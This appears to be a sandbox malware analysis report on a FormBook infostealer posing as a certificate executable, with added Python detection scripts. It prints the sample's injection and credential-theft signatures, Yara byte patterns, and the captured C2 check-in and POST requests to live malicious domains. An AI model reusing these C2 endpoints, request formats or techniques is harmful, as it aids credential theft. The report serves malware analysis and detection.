Windows Analysis Report
Certificate 11-18720.exe

Overview

General Information

Sample name: Certificate 11-18720.exe (renamed file extension from exe_ to exe)
Original sample name: Certificate 11-18720.exe_
Analysis ID: 1562576
MD5: 287e61624e5c839ff4b366e1969b3bce
SHA1: de64781dc1e8d8fa7c89c0e0e1952970efa6bafd
SHA256: 88bd9c321e78561ad3a06e28f49adf5c09a2ad460c39c946ebffd3ec716276d3

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Certificate 11-18720.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\Certificate 11-18720.exe" MD5: 287E61624E5C839FF4B366E1969B3BCE)
    • svchost.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\Certificate 11-18720.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • AQvzsYASIFuMivlIGfCCjBw.exe (PID: 5956 cmdline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 3448 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • AQvzsYASIFuMivlIGfCCjBw.exe (PID: 5580 cmdline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3716 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches, memory dumps (Source | Rule | Description | Author; matched strings listed beneath each entry):
00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 further memory-dump entries are not included in this extract)

Yara matches, unpacked PEs (Source | Rule | Description | Author):
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Sigma rule matches:
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-18720.exe, ParentProcessId: 7112, ParentProcessName: Certificate 11-18720.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ProcessId: 6212, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: identical to the event data of the preceding match (svchost.exe PID 6212 started by Certificate 11-18720.exe PID 7112)
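Both Sigma hits above fire on one event: svchost.exe started by the sample instead of by the service control manager, with a command line that still names the dropper. The Python below is an added example, not Joe Sandbox's code and not the logic of either Sigma rule; it approximates that check over constructed process-creation events using the field names the report shows (Image, ParentImage, CommandLine, ProcessId) and adds the image/command-line mismatch as a second, independent indicator of hollowing or injection. The set of expected svchost.exe parents and the sample events are assumptions made for the example.

```python
"""Flag svchost.exe launches that do not look like a normal service host.

Added example, not Joe Sandbox or Sigma code. The checks approximate the
idea behind the Sigma hits in this report; they are not the exact rule
logic. Field names follow the report's event data; the events themselves
are constructed for the example.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# Parents from which svchost.exe is normally started. Assumption for the
# example; baseline this set against the estate being monitored.
EXPECTED_SVCHOST_PARENTS = {"services.exe"}


@dataclass(frozen=True)
class Finding:
    process_id: int
    reason: str


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path, tolerating surrounding quotes."""
    return ntpath.basename(path.strip().strip('"')).lower()


def _image_from_cmdline(cmdline: str) -> str:
    """Executable named at the start of a command line ("quoted" or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def check_event(ev: dict) -> list[Finding]:
    """Return the reasons (possibly none) a process-creation event is suspect."""
    image = _basename(ev["Image"])
    if image != "svchost.exe":
        return []
    pid = int(ev["ProcessId"])
    cmdline = ev.get("CommandLine", "")
    findings: list[Finding] = []

    # 1. Unexpected parent: real service hosts are spawned by services.exe.
    parent = _basename(ev.get("ParentImage", ""))
    if parent not in EXPECTED_SVCHOST_PARENTS:
        findings.append(Finding(pid, f"parent is {parent or 'unknown'}, not the service control manager"))

    # 2. Hollowed host: the on-disk image is svchost.exe but the command line
    #    (inherited from the creating process) names a different executable.
    named = _basename(_image_from_cmdline(cmdline))
    if named and named != image:
        findings.append(Finding(pid, f"command line names {named!r} but image is svchost.exe"))

    # 3. A genuine service host carries a -k <service group> argument.
    if " -k " not in f" {cmdline} ":
        findings.append(Finding(pid, "no -k <service group> argument"))
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map each suspicious ProcessId to its list of reasons."""
    out: dict[int, list[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            out[hits[0].process_id] = [h.reason for h in hits]
    return out


# Constructed events; the first mirrors the Sigma hit in this report.
SAMPLE_EVENTS = [
    {"ProcessId": 6212, "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "ParentImage": r"C:\Users\user\Desktop\Certificate 11-18720.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Certificate 11-18720.exe"'},
    {"ProcessId": 1040, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p"},
    {"ProcessId": 3716, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"'},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, reasons)
```

The mismatch check is the one to keep even where a parent allow-list is noisy: a svchost.exe whose command line is a path under a user profile has no benign explanation, whereas unusual parents do occur with some management agents.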
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-25T18:11:47.039456+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 154.215.72.110 | 80 | TCP
2024-11-25T18:12:21.188999+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 116.50.37.244 | 80 | TCP
2024-11-25T18:13:44.783297+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49811 | 85.159.66.93 | 80 | TCP
2024-11-25T18:13:59.633445+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49957 | 91.195.240.94 | 80 | TCP
2024-11-25T18:14:23.456951+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50013 | 66.29.149.46 | 80 | TCP
2024-11-25T18:14:43.704610+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 195.110.124.133 | 80 | TCP
2024-11-25T18:15:15.646956+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50026 | 217.196.55.202 | 80 | TCP

AV Detection

Source: http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd, Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/, Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd, Avira URL Cloud: Label: malware
Source: http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd, Avira URL Cloud: Label: malware
Source: Certificate 11-18720.exe, ReversingLabs: Detection: 95%
Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Certificate 11-18720.exe, Joe Sandbox ML: detected
Source: Certificate 11-18720.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4134504423.000000000010E000.00000002.00000001.01000000.00000004.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1921834218.000000000010E000.00000002.00000001.01000000.00000004.sdmp (this PDB path belongs to Joe Security's own FakeChrome tool, which indicates that AQvzsYASIFuMivlIGfCCjBw.exe is a sandbox-provided decoy browser that FormBook injected into, not a file dropped by the sample)
Source: Binary string: wntdll.pdbUGP source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_00606CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00606CA9
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_006060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_006060DD
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_006063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_006063F9
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_0060EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0060EB60
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_0060F56F FindFirstFileW,FindClose, 0_2_0060F56F
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_0060F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0060F5FA
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_00611B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00611B2F
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_00611C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00611C8A
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_00611F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00611F94
Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 3_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose, 3_2_0046BAB0
Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 4x nop then xor eax, eax, 3_2_00459480
Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 4x nop then pop edi, 3_2_0045DD45
Source: C:\Windows\SysWOW64\netbtugc.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_02A4053E

Networking

Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 116.50.37.244:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49811 -> 85.159.66.93:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49957 -> 91.195.240.94:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50013 -> 66.29.149.46:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 195.110.124.133:80
Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 217.196.55.202:80
Source: DNS query: www.joyesi.xyz
Source: Joe Sandbox View, IP Address: 91.195.240.94
Source: Joe Sandbox View, IP Address: 154.215.72.110
Source: Joe Sandbox View, IP Address: 195.110.124.133
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 occurrences)
Source: C:\Users\user\Desktop\Certificate 11-18720.exe, Code function: 0_2_00614EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00614EB5
Source: global traffic, HTTP traffic detected (seven GET requests, all with the headers listed after them):
GET /fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd HTTP/1.1 (Host: www.3xfootball.com)
GET /fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd HTTP/1.1 (Host: www.goldenjade-travel.com)
GET /fo8o/?7BpTBrLp=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&3vjHf=mRWd HTTP/1.1 (Host: www.magmadokum.com)
GET /fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd HTTP/1.1 (Host: www.rssnewscast.com)
GET /fo8o/?7BpTBrLp=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&3vjHf=mRWd HTTP/1.1 (Host: www.techchains.info)
GET /fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd HTTP/1.1 (Host: www.elettrosistemista.zip)
GET /fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd HTTP/1.1 (Host: www.empowermedeco.com)
Common request headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Connection: close | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic, DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic, DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic, DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic, DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic, DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic, DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic, DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic, DNS traffic detected: DNS query: www.techchains.info
Source: global traffic, DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic, DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic, DNS traffic detected: DNS query: www.660danm.top
Source: global traffic, DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic, DNS traffic detected: DNS query: www.joyesi.xyz
Source: unknown, HTTP traffic detected: POST /fo8o/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en | Accept-Encoding: gzip, deflate, br | Host: www.goldenjade-travel.com | Origin: http://www.goldenjade-travel.com | Cache-Control: no-cache | Connection: close | Content-Type: application/x-www-form-urlencoded | Content-Length: 205 | Referer: http://www.goldenjade-travel.com/fo8o/ | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) | Body (ASCII; the raw hex dump of the same bytes is omitted): 7BpTBrLp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
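The GET and POST requests above share one shape: the same path (/fo8o/) and the same two query-parameter names (one long opaque value, one short constant tag) across a rotating list of unrelated domains, an IE8-era User-Agent, and a follow-up POST of the same form field to the host that answered. The script below is an added example, not Suricata's, Emerging Threats' or Joe Sandbox's code; it applies that structural pattern to constructed, tab-separated proxy log lines that reuse four of the URIs captured here. The log format, the timestamps, the thresholds (three distinct hosts within ten minutes) and the benign client 192.168.2.9 are assumptions made for the example.

```python
"""Spot FormBook-style C2 check-ins in HTTP proxy logs.

Added example, not Joe Sandbox, Suricata or Emerging Threats code. It keys
on request structure (same path and parameter names across many hosts in a
short burst) rather than on the literal path or parameter names, which are
specific to this sample. Log lines are constructed; the tab-separated
format (timestamp, client, method, host, URI, User-Agent) is an assumption.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit

# Constructed log. The four /fo8o/ URIs are the ones captured in this report;
# the IE8 User-Agent is shortened; timestamps and the benign client are made up.
SAMPLE_LOG = """\
2024-11-25T18:11:46\t192.168.2.4\tGET\twww.3xfootball.com\t/fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
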